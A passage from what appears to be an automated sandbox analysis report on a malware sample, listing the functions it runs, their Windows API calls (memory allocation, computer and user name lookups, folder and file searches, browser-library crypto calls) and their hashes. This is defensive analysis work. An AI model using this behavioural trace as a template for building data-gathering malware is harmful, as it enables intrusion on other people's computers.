                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                                                                        • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044065B0), ref: 00412AD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2699682494-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
                                                                                                                                                                                                                                                                                        • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                                                        • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
                                                                                                                                                                                                                                                                                        • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                                                                        • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1004333139-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                                                        • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415530 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d5c28e0c1c7e45756f81669eafe0f10d1f2d27191eaad386d3d0ade1da73dce0
                                                                                                                                                                                                                                                                                        • Instruction ID: 5f6283e4cb308baa7d4615cf810ff09d37e65c2d0c188b0d2e4390bfcb6d80e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5c28e0c1c7e45756f81669eafe0f10d1f2d27191eaad386d3d0ade1da73dce0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4701E834904508FFCF04CF98C585BEC7BB2AF44308F648089D9056B395D3789A84DB49
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                                                                        • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 6C756C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C756CCC
                                                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C756D11
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C756D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C756D35
                                                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C756D53
                                                                                                                                                                                                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C756D73
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C756D80
                                                                                                                                                                                                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C756DC0
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C756DDC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C756DEB
                                                                                                                                                                                                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C756DFF
                                                                                                                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C756E10
                                                                                                                                                                                                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C756E27
                                                                                                                                                                                                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C756E34
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C756EF9
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C756F7D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C756F8C
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C75709D
                                                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C757103
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C757153
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C757176
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C757209
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75723A
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75726B
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75729C
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7572DC
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75730D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C7573C2
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7573F3
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7573FF
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C757406
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C75740D
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C75741A
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C75755A
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C757568
                                                                                                                                                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C757585
                                                                                                                                                                                                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C757598
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C7575AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                        • Opcode ID: 3b03f03268a15a4c0df50450a1858a2bbb7188d4a31b5343c0bd532602630220
                                                                                                                                                                                                                                                                                        • Instruction ID: c9efdc1c59cf4c0a1ce5443dd95a3d2277f7737d8de05fbe047fae495d65d0ee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b03f03268a15a4c0df50450a1858a2bbb7188d4a31b5343c0bd532602630220
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E52D771A002159FEB21DF25CE88BAA77BCFB45714F5081A9E909A7640DF30AF94CF91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7564C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7564DF
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7564F2
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C756505
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C756518
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C75652B
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C75671C
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C756724
                                                                                                                                                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C75672F
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C756759
                                                                                                                                                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C756764
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C756A80
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C756ABE
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C756AD3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C756AE8
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C756AF7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
